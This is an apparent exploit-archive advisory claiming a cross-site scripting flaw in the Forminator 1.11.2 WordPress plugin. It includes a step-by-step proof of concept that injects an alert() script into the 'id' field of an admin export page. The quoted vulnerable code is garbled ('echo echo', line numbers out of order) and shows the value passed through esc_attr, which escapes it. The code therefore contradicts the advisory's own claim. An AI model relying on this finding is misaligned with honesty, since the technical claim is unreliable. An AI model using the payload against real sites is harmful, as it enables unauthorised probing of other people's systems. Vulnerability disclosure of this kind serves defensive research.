WordPress Forminator 1.11.2 Cross Site Scripting

WordPress Forminator plugin version 1.11.2 suffers from a cross site scripting vulnerability.


MD5 | 60f7c136c4c110bf81bf9f71235190ff

[-] Title  : word press plugin forminator 1.11.2 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/forminator/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
forminator/admin/views/custom-form/popup/export.php
==============================================================================================
Vulnerable Source:
46: echo echo esc_attr($form_id);
2: $form_id = $_POST['id'];
===============================================================================================
POC :
http://localhost/wp-content/plugins/forminator/admin/views/custom-form/popup/export.php

step 1 = Go To Web Page =
http://localhost/wp-content/plugins/forminator/admin/views/custom-form/popup/export.php

Step 2 = In the box : "id"

Step 3 = input box , Add JavaScript Code : <script>alert('XSS')</script>
===============================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : [email protected]
************************

Related Posts